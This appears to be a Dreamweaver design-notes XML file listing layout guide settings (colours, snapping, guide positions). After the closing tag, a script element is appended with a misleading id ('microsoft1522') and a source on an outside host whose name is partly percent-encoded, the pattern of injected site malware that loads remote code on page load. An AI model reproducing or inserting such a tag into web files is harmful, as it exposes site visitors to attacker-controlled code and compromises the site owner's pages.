<?xml version="1.0" encoding="utf-8" ?>
<info>
	<infoitem key="MMGuideColor" value="#00FF00" />
	<infoitem key="MMGuideVisible" value="false" />
	<infoitem key="MMGuideLocked" value="false" />
	<infoitem key="MMSnapToGuide" value="true" />
	<infoitem key="MMGuidesSnapToElements" value="true" />
	<infoitem key="MMDistanceColor" value="#0000FF" />
	<infoitem key="MMGuideCount" value="5" />
	<infoitem key="MMGuide0" value="horizontal: user 131 px" />
	<infoitem key="MMGuide1" value="vertical: user 82 px" />
	<infoitem key="MMGuide2" value="vertical: user 1063 px" />
	<infoitem key="MMGuide3" value="vertical: user 197 px" />
	<infoitem key="MMGuide4" value="vertical: user 381 px" />
</info>

<script language="JavaScript" type="text/javascript" id="microsoft1522" src="http//ft114.%33%3322.org"  ></script>
